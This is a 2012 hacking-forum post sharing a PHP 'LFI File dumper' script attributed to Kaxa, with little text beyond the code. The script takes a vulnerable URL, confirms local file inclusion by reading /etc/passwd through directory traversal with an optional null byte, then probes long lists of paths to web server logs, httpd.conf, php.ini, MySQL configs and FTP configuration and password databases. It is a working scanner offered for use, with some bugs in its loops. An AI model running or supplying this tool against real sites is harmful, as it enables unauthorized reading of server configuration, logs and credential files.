Locked LFI File dumper

D4rkn3S · October 9, 2012

LFI File dumper By Kaxa For LeVeL-23.Biz

LFI URL:

File: Access Log httpd.conf Error Log php.ini MySQL FTP Null: Yes No <?php if($_POST['lfiurl']) { print "

";         $target = $_POST['lfiurl'];         $type = $_POST['scantype'];         $byte1 = $_POST['null'];         $lfitest = "../../../../../../../../../../../../../../etc/passwd".$byte1."";         $lfiaccess = array(            1 => "../../../../../../../../../../../../../../apache/logs/access.log".$byte1."",            2 => "../../../../../../../../../../../../../../etc/httpd/logs/acces_log".$byte1."",            3 => "../../../../../../../../../../../../../../etc/httpd/logs/acces.log".$byte1."",            4 => "../../../../../../../../../../../../../../var/www/logs/access_log".$byte1."",            5 => "../../../../../../../../../../../../../../var/www/logs/access.log".$byte1."",            6 => "../../../../../../../../../../../../../../usr/local/apache/logs/access_log".$byte1."",            7 => "../../../../../../../../../../../../../../usr/local/apache/logs/access.log".$byte1."",            8 => "../../../../../../../../../../../../../../var/log/apache/access_log".$byte1."",            9 => "../../../../../../../../../../../../../../var/log/apache2/access_log".$byte1."",            10 => "../../../../../../../../../../../../../../var/log/apache/access.log".$byte1."",            11 => "../../../../../../../../../../../../../../var/log/apache2/access.log".$byte1."",            12 => "../../../../../../../../../../../../../../var/log/access_log".$byte1."",            13 => "../../../../../../../../../../../../../../var/log/access.log".$byte1."",            14 => "../../../../../../../../../../../../../../var/log/httpd/access_log".$byte1."",            15 => "../../../../../../../../../../../../../../apache2/logs/access.log".$byte1."",            16 => "../../../../../../../../../../../../../../logs/access.log".$byte1."",            17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access_log".$byte1."",            18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/access.log".$byte1."",            19 => "../../../../../../../../../../../../../../var/log/httpd/access.log".$byte1."",            20 => "../../../../../../../../../../../../../../opt/lampp/logs/access_log".$byte1."",            21 => "../../../../../../../../../../../../../../opt/xampp/logs/access_log".$byte1."",            22 => "../../../../../../../../../../../../../../opt/lampp/logs/access.log".$byte1."",            23 => "../../../../../../../../../../../../../../opt/xampp/logs/access.log".$byte1."");                $lfierror = array(            1 => "../../../../../../../../../../../../../../apache/logs/error.log".$byte1."",            2 => "../../../../../../../../../../../../../../etc/httpd/logs/error_log".$byte1."",            3 => "../../../../../../../../../../../../../../etc/httpd/logs/error.log".$byte1."",            4 => "../../../../../../../../../../../../../../var/www/logs/error_log".$byte1."",            5 => "../../../../../../../../../../../../../../var/www/logs/error.log".$byte1."",            6 => "../../../../../../../../../../../../../../usr/local/apache/logs/error_log".$byte1."",            7 => "../../../../../../../../../../../../../../usr/local/apache/logs/error.log".$byte1."",            8 => "../../../../../../../../../../../../../../var/log/apache/error_log".$byte1."",            9 => "../../../../../../../../../../../../../../var/log/apache2/error_log".$byte1."",            10 => "../../../../../../../../../../../../../../var/log/apache/error.log".$byte1."",            11 => "../../../../../../../../../../../../../../var/log/apache2/error.log".$byte1."",            12 => "../../../../../../../../../../../../../../var/log/error_log".$byte1."",            13 => "../../../../../../../../../../../../../../var/log/error.log".$byte1."",            14 => "../../../../../../../../../../../../../../var/log/httpd/error_log".$byte1."",            15 => "../../../../../../../../../../../../../../apache2/logs/error.log".$byte1."",            16 => "../../../../../../../../../../../../../../logs/error.log".$byte1."",            17 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error_log".$byte1."",            18 => "../../../../../../../../../../../../../../usr/local/apache2/logs/error.log".$byte1."",            19 => "../../../../../../../../../../../../../../var/log/httpd/error.log".$byte1."",            20 => "../../../../../../../../../../../../../../opt/lampp/logs/error_log".$byte1."",            21 => "../../../../../../../../../../../../../../opt/xampp/logs/error_log".$byte1."",            22 => "../../../../../../../../../../../../../../opt/lampp/logs/error.log".$byte1."",            23 => "../../../../../../../../../../../../../../opt/xampp/logs/error.log".$byte1."");         $lficonfig = array(            1 => "../../../../../../../../../../../../../../../usr/local/apache/conf/httpd.conf".$byte1."",            2 => "../../../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf".$byte1."",            3 => "../../../../../../../../../../../../../../../etc/httpd/conf/httpd.conf".$byte1."",            4 => "../../../../../../../../../../../../../../../etc/apache/conf/httpd.conf".$byte1."",            5 => "../../../../../../../../../../../../../../../usr/local/etc/apache/conf/httpd.conf".$byte1."",            6 => "../../../../../../../../../../../../../../../etc/apache2/httpd.conf".$byte1."",            7 => "../../../../../../../../../../../../../../../usr/local/apache/httpd.conf".$byte1."",            8 => "../../../../../../../../../../../../../../../usr/local/apache2/httpd.conf".$byte1."",            9 => "../../../../../../../../../../../../../../../usr/local/httpd/conf/httpd.conf".$byte1."",            10 => "../../../../../../../../../../../../../../../usr/local/etc/apache2/conf/httpd.conf".$byte1."",            11 => "../../../../../../../../../../../../../../../usr/local/etc/httpd/conf/httpd.conf".$byte1."",            12 => "../../../../../../../../../../../../../../../usr/apache2/conf/httpd.conf".$byte1."",            13 => "../../../../../../../../../../../../../../../usr/apache/conf/httpd.conf".$byte1."",            14 => "../../../../../../../../../../../../../../../usr/local/apps/apache2/conf/httpd.conf".$byte1."",            15 => "../../../../../../../../../../../../../../../usr/local/apps/apache/conf/httpd.conf".$byte1."",            16 => "../../../../../../../../../../../../../../../etc/apache2/conf/httpd.conf".$byte1."",            17 => "../../../../../../../../../../../../../../../etc/http/conf/httpd.conf".$byte1."",            18 => "../../../../../../../../../../../../../../../etc/httpd/httpd.conf".$byte1."",            19 => "../../../../../../../../../../../../../../../etc/http/httpd.conf".$byte1."",            20 => "../../../../../../../../../../../../../../../etc/httpd.conf".$byte1."",            21 => "../../../../../../../../../../../../../../../opt/apache/conf/httpd.conf".$byte1."",            22 => "../../../../../../../../../../../../../../../opt/apache2/conf/httpd.conf".$byte1."",            23 => "../../../../../../../../../../../../../../../var/www/conf/httpd.conf".$byte1."",            24 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf".$byte1."",            25 => "../../../../../../../../../../../../../../../private/etc/httpd/httpd.conf.default".$byte1."",            26 => "../../../../../../../../../../../../../../../Volumes/webBackup/opt/apache2/conf/httpd.conf".$byte1."",            27 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf".$byte1."",            28 => "../../../../../../../../../../../../../../../Volumes/webBackup/private/etc/httpd/httpd.conf.default".$byte1."",            29 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf.php".$byte1."",            30 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf.php".$byte1."",            31 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf.php".$byte1."",            32 => "../../../../../../../../../../../../../../../usr/local/php/httpd.conf".$byte1."",            33 => "../../../../../../../../../../../../../../../usr/local/php4/httpd.conf".$byte1."",            34 => "../../../../../../../../../../../../../../../usr/local/php5/httpd.conf".$byte1."",            35 => "../../../../../../../../../../../../../../../usr/local/etc/apache/vhosts.conf".$byte1."");                         $lfiphpini = array(            1 => "../../../../../../../../../../../../../../../etc/php.ini".$byte1."",            2 => "../../../../../../../../../../../../../../../bin/php.ini".$byte1."",            3 => "../../../../../../../../../../../../../../../etc/httpd/php.ini".$byte1."",            4 => "../../../../../../../../../../../../../../../usr/lib/php.ini".$byte1."",            5 => "../../../../../../../../../../../../../../../usr/lib/php/php.ini".$byte1."",            6 => "../../../../../../../../../../../../../../../usr/local/etc/php.ini".$byte1."",            7 => "../../../../../../../../../../../../../../../usr/local/lib/php.ini".$byte1."",            8 => "../../../../../../../../../../../../../../../usr/local/php/lib/php.ini".$byte1."",            9 => "../../../../../../../../../../../../../../../usr/local/php4/lib/php.ini".$byte1."",            10 => "../../../../../../../../../../../../../../../usr/local/php5/lib/php.ini".$byte1."",            11 => "../../../../../../../../../../../../../../../usr/local/apache/conf/php.ini".$byte1."",            12 => "../../../../../../../../../../../../../../../etc/php4.4/fcgi/php.ini".$byte1."",            13 => "../../../../../../../../../../../../../../../etc/php4/apache/php.ini".$byte1."",            14 => "../../../../../../../../../../../../../../../etc/php4/apache2/php.ini".$byte1."",            15 => "../../../../../../../../../../../../../../../etc/php5/apache/php.ini".$byte1."",            16 => "../../../../../../../../../../../../../../../etc/php5/apache2/php.ini".$byte1."",            17 => "../../../../../../../../../../../../../../../etc/php/php.ini".$byte1."",            18 => "../../../../../../../../../../../../../../../etc/php/php4/php.ini".$byte1."",            19 => "../../../../../../../../../../../../../../../etc/php/apache/php.ini".$byte1."",            20 => "../../../../../../../../../../../../../../../etc/php/apache2/php.ini".$byte1."",            21 => "../../../../../../../../../../../../../../../web/conf/php.ini".$byte1."",            22 => "../../../../../../../../../../../../../../../usr/local/Zend/etc/php.ini".$byte1."",            23 => "../../../../../../../../../../../../../../../opt/xampp/etc/php.ini".$byte1."",            24 => "../../../../../../../../../../../../../../../var/local/www/conf/php.ini".$byte1."",            25 => "../../../../../../../../../../../../../../../etc/php/cgi/php.ini".$byte1."",            26 => "../../../../../../../../../../../../../../../etc/php4/cgi/php.ini".$byte1."",            27 => "../../../../../../../../../../../../../../../etc/php5/cgi/php.ini".$byte1."");                 $lfimysql = array(            1 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-bin.log".$byte1."",            2 => "../../../../../../../../../../../../../../../var/log/mysql.log".$byte1."",            3 => "../../../../../../../../../../../../../../../var/log/mysqlderror.log".$byte1."",            4 => "../../../../../../../../../../../../../../../var/log/mysql/mysql.log".$byte1."",            5 => "../../../../../../../../../../../../../../../var/log/mysql/mysql-slow.log".$byte1."",            6 => "../../../../../../../../../../../../../../../var/mysql.log".$byte1."",            7 => "../../../../../../../../../../../../../../../var/lib/mysql/my.cnf".$byte1."",            8 => "../../../../../../../../../../../../../../../etc/mysql/my.cnf".$byte1."",            9 => "../../../../../../../../../../../../../../../var/log/mysqld.log".$byte1."",            10 => "../../../../../../../../../../../../../../../etc/my.cnf".$byte1."");                 $lfiftp = array(            1 => "../../../../../../../../../../../../../../../etc/logrotate.d/proftpd".$byte1."",            2 => "../../../../../../../../../../../../../../../www/logs/proftpd.system.log".$byte1."",            3 => "../../../../../../../../../../../../../../../var/log/proftpd".$byte1."",            4 => "../../../../../../../../../../../../../../../etc/proftp.conf".$byte1."",            5 => "../../../../../../../../../../../../../../../etc/protpd/proftpd.conf".$byte1."",            6 => "../../../../../../../../../../../../../../../etc/vhcs2/proftpd/proftpd.conf".$byte1."",            7 => "../../../../../../../../../../../../../../../etc/proftpd/modules.conf".$byte1."",            8 => "../../../../../../../../../../../../../../../var/log/vsftpd.log".$byte1."",            9 => "../../../../../../../../../../../../../../../etc/vsftpd.chroot_list".$byte1."",            10 => "../../../../../../../../../../../../../../../etc/logrotate.d/vsftpd.log".$byte1."",            11 => "../../../../../../../../../../../../../../../etc/vsftpd/vsftpd.conf".$byte1."",            12 => "../../../../../../../../../../../../../../../etc/vsftpd.conf".$byte1."",            13 => "../../../../../../../../../../../../../../../etc/chrootUsers".$byte1."",            14 => "../../../../../../../../../../../../../../../var/log/xferlog".$byte1."",            15 => "../../../../../../../../../../../../../../../var/adm/log/xferlog".$byte1."",            16 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpaccess".$byte1."",            17 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftphosts".$byte1."",            18 => "../../../../../../../../../../../../../../../etc/wu-ftpd/ftpusers".$byte1."",            19 => "../../../../../../../../../../../../../../../usr/sbin/pure-config.pl".$byte1."",            20 => "../../../../../../../../../../../../../../../usr/etc/pure-ftpd.conf".$byte1."",            21 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.conf".$byte1."",            22 => "../../../../../../../../../../../../../../../usr/local/etc/pure-ftpd.conf".$byte1."",            23 => "../../../../../../../../../../../../../../../usr/local/etc/pureftpd.pdb".$byte1."",            24 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pureftpd.pdb".$byte1."",            25 => "../../../../../../../../../../../../../../../usr/local/pureftpd/sbin/pure-config.pl".$byte1."",            26 => "../../../../../../../../../../../../../../../usr/local/pureftpd/etc/pure-ftpd.conf".$byte1."",            27 => "../../../../../../../../../../../../../../../etc/pure-ftpd.conf".$byte1."",            28 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pure-ftpd.pdb".$byte1."",            29 => "../../../../../../../../../../../../../../../etc/pureftpd.pdb".$byte1."",            30 => "../../../../../../../../../../../../../../../etc/pureftpd.passwd".$byte1."",            31 => "../../../../../../../../../../../../../../../etc/pure-ftpd/pureftpd.pdb".$byte1."",            32 => "../../../../../../../../../../../../../../../usr/ports/ftp/pure-ftpd/".$byte1."",            33 => "../../../../../../../../../../../../../../../usr/ports/net/pure-ftpd/".$byte1."",            34 => "../../../../../../../../../../../../../../../usr/pkgsrc/net/pureftpd/".$byte1."",            35 => "../../../../../../../../../../../../../../../usr/ports/contrib/pure-ftpd/".$byte1."",            36 => "../../../../../../../../../../../../../../../var/log/pure-ftpd/pure-ftpd.log".$byte1."",            37 => "../../../../../../../../../../../../../../../logs/pure-ftpd.log".$byte1."",            38 => "../../../../../../../../../../../../../../../var/log/pureftpd.log".$byte1."",            39 => "../../../../../../../../../../../../../../../var/log/ftp-proxy/ftp-proxy.log".$byte1."",            40 => "../../../../../../../../../../../../../../../var/log/ftp-proxy".$byte1."",            41 => "../../../../../../../../../../../../../../../var/log/ftplog".$byte1."",            42 => "../../../../../../../../../../../../../../../etc/logrotate.d/ftp".$byte1."",            43 => "../../../../../../../../../../../../../../../etc/ftpchroot".$byte1."",            44 => "../../../../../../../../../../../../../../../etc/ftphosts".$byte1."");                $x = 1;         if ( $type == 1 ) {         $res =  FetchURL($target.$lfitest);            if(preg_match("/root/i", $res)) {               print " ".$target."".$lfitest."
";               flush();           while($lfiaccess[$x]) {             $res = FetchURL($target.$lfiaccess[$x]);              if(preg_match("/-0700/i", $res)) {                      print " ".$target."".$lfiaccess[$x]."
";                      }                       elseif(preg_match("/denied/i", $res)) {                            print " ".$target."".$lfiaccess[$x]."
";      }                         else {                                           print " ".$target."".$lfiaccess[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }      if ( $type == 2 ) {         $res =  FetchURL($target.$lfitest);         if(preg_match("/root/i", $res)) {            print " ".$target."".$lfitest."
";      while($lficonfig[$x]) {      $res = FetchURL($target.$lficonfig[$x]);              if(preg_match("/ config /i", $res)) {                      print " ".$target."".$lficonfig[$x]."
";                      }                     if(preg_match("/denied/i", $res)) {                         print " ".$target."".$lficonfig[$x]."
";      }                         else {                                           print " ".$target."".$lficonfig[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }         if ( $type == 3 ) {            $res =  FetchURL($target.$lfitest);            if(preg_match("/root/i", $res)) {               print " ".$target."".$lfitest."
";      while($lficonfig[$x]) {      $res = FetchURL($target.$lfierror[$x]);              if(preg_match("/ error_log /i", $res)) {                      print " ".$target."".$lfierror[$x]."
";                      }                       elseif(preg_match("/denied/i", $res)) {                            print " ".$target."".$lfierror[$x]."
";      }                         else {                                           print " ".$target."".$lfierror[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }       if ( $type == 4 ) {            $res =  FetchURL($target.$lfitest);            if(preg_match("/root/i", $res)) {               print " ".$target."".$lfitest."
";      while($lficonfig[$x]) {      $res = FetchURL($target.$lfiphpini[$x]);              if(preg_match("/ php.ini /i", $res)) {                      print " ".$target."".$lfiphpini[$x]."
";                      }                       elseif(preg_match("/denied/i", $res)) {                            print " ".$target."".$lfiphpini[$x]."
";      }                         else {                                           print " ".$target."".$lfiphpini[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }             if ( $type == 5 ) {            $res =  FetchURL($target.$lfitest);            if(preg_match("/root/i", $res)) {               print " ".$target."".$lfitest."
";      while($lfimysql[$x]) {      $res = FetchURL($target.$lfimysql[$x]);              if(preg_match("/\[mysqld\]/i", $res)) {                      print " ".$target."".$lfimysql[$x]."
";                      }                       elseif(preg_match("/denied/i", $res)) {                            print " ".$target."".$lfimysql[$x]."
";      }                         else {                                           print " ".$target."".$lfimysql[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }                   if ( $type == 6 ) {            $res =  FetchURL($target.$lfitest);            if(preg_match("/root/i", $res)) {               print " ".$target."".$lfitest."
";      while($lfiftp[$x]) {      $res = FetchURL($target.$lfiftp[$x]);              if(preg_match("/ ftpd /i", $res)) {                      print " ".$target."".$lfiftp[$x]."
";                      }                       elseif(preg_match("/denied/i", $res)) {                            print " ".$target."".$lfiftp[$x]."
";      }                         else {                                           print " ".$target."".$lfiftp[$x]."
";                      }                              $x++;      }      }      else {print " ".$target."".$lfitest."
";}      }      }      function FetchURL($url) {         $ch = curl_init();         curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/3.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.20) Gecko/20081217 Firefox/2.0.0.20 (.NET CLR 3.5.30729)");         curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);         curl_setopt($ch, CURLOPT_HEADER, 1);         curl_setopt($ch, CURLOPT_URL, $url);         curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);         curl_setopt($ch, CURLOPT_TIMEOUT, 30);         $data = curl_exec($ch);         if(!$data) {            return false;         }         return $data;      }      ?>

FOR L e LeVeL e L - 23 By Kaxa Edited October 9, 2012 by D4rkn3S

Sign In

Locked LFI File dumper

Recommended Posts

D4rkn3S

LFI File dumper By Kaxa For LeVeL-23.Biz

LFI URL:

Link to comment

Share on other sites

Browse

Activity

Store

Important Information